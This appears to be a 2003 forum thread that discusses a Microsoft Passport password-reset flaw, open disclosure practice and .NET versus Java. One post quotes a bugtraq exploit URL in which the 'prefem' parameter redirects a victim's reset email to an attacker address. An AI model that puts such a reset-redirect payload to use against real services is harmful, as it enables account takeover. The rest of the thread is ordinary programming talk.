A little more diversity in the world of computer operating systems would lead to increased development costs, bug counts, and complications since there's a wide variety OSes the software interferes with.

Of course, others would argue it'd be fine to just make a simple "standard" (like a POSIX on steroids), and have a bunch of programs interface with it.

If we did that, it'd stifle progress and innovation.

No kidding, but you'll find that the hardest mistakes to catch in programming are the really dumb ones.

This bug in particular would have never been caught by using MS' /GS compile flag, checking buffer overflows, or by examining logic and permissions. Somebody forgot a simple 'if' somewhere which qualified where the host came from.

It's like FG said, stuff like that sometimes slips out and you don't know it's broken until someone finds out about it.

This speaks more to your level of skill than the complexity of commercial grade programming. Somehow, when you talk about two forms and 500 lines of code, I have a vision of you putting all that code in the initial form's open method.

.net only has a couple of really problematic areas (garbage collection and workarounds for deterministic finalization of objects being one) and has a years long history of development (it's COM+ under a new name), a huge staff, and a huge development budget.

Software security is a matter of testing and consistent application of sound practices. The problem with this is not how quickly or how it was caught, but that it was a very basic human error type of lapse.

MtG: Have you had a chance to use .NET Framework 1.1 yet?

I've not yet (still on VS.NET 2002 and .NET 1.0), but the changelogs I've read said that garbage collection and performance in general has been improved.

And "Then" and probably "Or Else"

Exactly. You get it.


Why does that still stick? I was totally razzling him back in the day. Oh what I would do to see that thread again. And my n00bish antics.






blah blah..i threw it out as an example. Total number of programs Steve has tried to write: 10. Total number of programs steve has gotten to work: 0. Total number of programs steve is trying to figure out: 3 . Total number of Dynamic Array's steve is trying to figure out this weekend:3. Steve doesnt understand Database libraries very well


anyway

.net is a good idea. It makes things a helluvalot easier. I wish everybody was .net

The problem is. This stuff isnt picked up in Debug or with whatever standard tools MS uses. So all the testing in the world STILL wont fix everything.

actually that last one didnt make any sense cuz my text GOT EATEN!!!!!!!!!

Im not retypin it. '

err...alot of it.

I haven't yet. I have a fairly big project in development now, and I don't want to change while in development without evaluating the differences first. Right now, I don't have the luxury of spare boxes just to test the differences, because Bush's war and the spike in fuel prices delayed the development money I'm getting from my client.

Garbage collection is a bit too random as far as when it occurs in .NET 1.0, and I have a lot of high-end resources to release (DB connections and sockets, including SSL sockets, in particular), so I've been in the habit of forcing dereferenced objects to be GC'd explicitly.

It would be great if there was a way to specify by property your desired priorities for objects or classes to be checked for GC, or if you could control the frequency, but I'll take any improvement I can get in it.

It seems in this case Microsoft reacted really quick. I would give them a thumbs-up, except that I never could be arsed to open a passport account at all, so I don't care.

Asher - in my books you are a rightwinger at the very least. Not that this would be a reason to insult you, though.

I consider myself a right-winger, too, but I still am very socially liberal.

Gay equal rights, public healthcare, welfare, public transportation, pro-choice, etc.

Some things just fit.

Dynarrays in VB 6, or VB .NET? Are you using ADO, or just calling local MDB files?

Logic problems are never picked up with coding tools. I have a large commercial app suite I'm working on, that among other things, grants various levels of access to many parties (lenders, owners, customers, management auditors, maintenance pukes, accounting people, etc.), inside and outside the enterprise owner. Depending on who you are and your level of access with a particular project, you can remotely shut down a powerplant in the middle of summer, or adjust a bill for a six-figure amount, or examine maintenance history. (A big deal if there's a multimillion dollar warranty claim.) You can also demote administrators, etc. Depending on who you are, you can have entirely different roles on different projects, which are open-ended - there can be a hundred of them.

All the various auth/auth stuff I do can be code checked with tools, but the logical choices of who has what permissions have to be checked by hand against my code spec and design documents. As does the process of making sure, on all parts of the databases, that whatever is not explicitly permitted is denied. In the development phase, I can do that by hand because I have just a few test databases, but in the commercial release, I have to write a custom tool just to do that sort of permissions setup, and to verify that permissions are set accurately. I get my ass sued into the ground if I screw up. So yes, it can be done.

when you're quoting an article you should quote all the paragraph and not a phrase out of context:

The security consultant also said that he had repeatedly sent e-mail warnings to Microsoft's abuse and security addresses at Hotmail.com to no avail. However, he didn't send an e-mail to Microsoft's standard security contact point, secure@microsoft.com.
No way, trying to contact abuse@hotmail.com for a hotmail (and passport) vulnerability and being answered by NLP bot is not the same as trying to warn pr@microsoft.com

I hope for Microsoft that they really didn't found the story on C|Net...
The author made his post on bugtraq, a well known security mailing-list and Microsoft probably read it there (are you trying to defend MS or to insult it?)

About the leak to the public:
It is called open-disclosure and is what forces a lot of companies to fix bugs quickly, you start sending mails to the company warning them about the bug you've discovered and if they don't answer you, you simply submit it to a security mailing-list.
It was invented because someone discovered that when the vulnerability was public the company was able to fix it in a couple of hours, while when it wasn't the company took months just to answer the mail.
It happens for Microsoft, Adobe, RedHat, Oracle, Mandrake... etc, it's not just an anti-MS invention.

Form the original post to bugtraq:

Vulnerability / Flaw discovered : 12th April 2003
Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)

He waited answer since 12th April, he didn't send two mails one at Hotmail and one to bugtraq the same day!

You see that open-disclosure works?

I totally agree with you on this in general, but in this case i can't, this is from the post to bugtraq


All you got to do is hit the following in your browser:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1

And you’ll get an email on attacker@attacker.com asking you to click on a url something like this:

http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033

From that url, you can reset the password and I don’t think I need to say anything more about it.

Now, how on the hell they left prefem to accept any email address? it's not like a buffer overflow, it's a giant conceptual mistake, and done on Passport, not on Age of Empires!

What's about .NET ? I really like it

BTW, i'm not against MS, their security-policy is good enough (expecially compared with that of other companies like Adobe for example) and the huge quantity of bugs found in its products is due to the quantity of code that they write

Ah, after the researcher sent 10 e-mail to MS without a response.

So much for "Trustworthy Computing." This wasn't even an obscure hole. It was pathetic programming to begin with.

Maybe, but .NET still beats the **** out of anything else out there.

Luckily for Sun, Java is now a standard for the US military, who is upgrading systems by porting non-OOP Ada and other legacy spaghetti code base to a non-objectified approach using Java spaghetti code.

I have not used .NET so I can't tell, but if it's just repackaged COM, I would have to say ORB/COBRA is a better architecture. You can't really compare .NET and Java though, because .NET is about "Web services" (whatever that means) and Java is about portable, write-once run-many, code.

.NET is both broader and more advanced than COM in several ways. Although M$ originally was going to call it COM+, it made sense to rename it, as the similarity to COM is minimal.

"Web services" are just a small aspect of .NET - there's really no reason not to use it for standard desktop applications, n-tier, or web apps. J2EE also addresses web services, which really are (IMO) still at the stage of being a solution looking for a problem. .NET is much more about being a cross-platform capable operating environment, without being dependent on "The mother of all languages" nonsense.

Java is hardly a panacea - it's lots of fun to want to make use of features in 1.3 or 1.4, while knowing some of the devices you want to support only have 1.1 or 1.2 compatible JVMs. Java still has it's place - I wouldn't try writing game apps for my Nextel phone in .NET for another year or two.

Not to mention that Java does it's "one size (almost, usually, well, more often than not) fits (almost, some of the time) all" by compromising both on speed and on implementation. GUI elements in Java on Windows suck compared to native Windows elements, regardless of whether you use the M$ or Sun JVMs. Java interoperability with languages like C++ is problematic, and sometimes just painful.

.NET does a lot of things for you:

It frees you from DLL-hell by providing excellent versioning tools. Each app can specify versioning behavior of its components by default global behavior, at the app level, or at the level of each component. Automatic updating via remote server is easy, and won't break anything else, even if the components being updates reside in the global assembly cache.

Inheritance and other OOP features and memory management is fully supported in all .NET compliant languages, including stuff like COBOL.

Objects written in one .NET compliant language are seamlessly compatible in all respects with objects written in any other .NET compliant language, so you can program in your preferred language or use the language tool best adapted to what you're doing. You also no longer have to care what language 3rd-party components or assemblies are written in, there are no compatibility issues.

Dependence on the Windows registry and Win32 API calls is completely eliminated, so all .NET apps are fully compatible with all Win versions, if they're running the .NET framework.

Assemblies can reside privately to the application, or globally, or any mixture, and the delivered app automatically finds the right ones.

Memory leaks are eliminated by garbage collection, which can be invoked manually.

The independence from Win32API and the registry, plus the specs of the MS Intermediate Language will allow development of non-Windows .NET frameworks, giving platform independence a la the JVM, but with a lot more optimization.

Depending on the device restrictions you have to deal with and any specific requirements you have, .NET apps and assemblies all originally compile by a JITter, but you can either have the app or assembly continue with JIT behavior, or just do it the first time and run the precompiled app every subsequent time.

Oh, and it's backwards compatible with COM. Even COM objects that couldn't talk to each other in DCOM work seemlessly together in .NET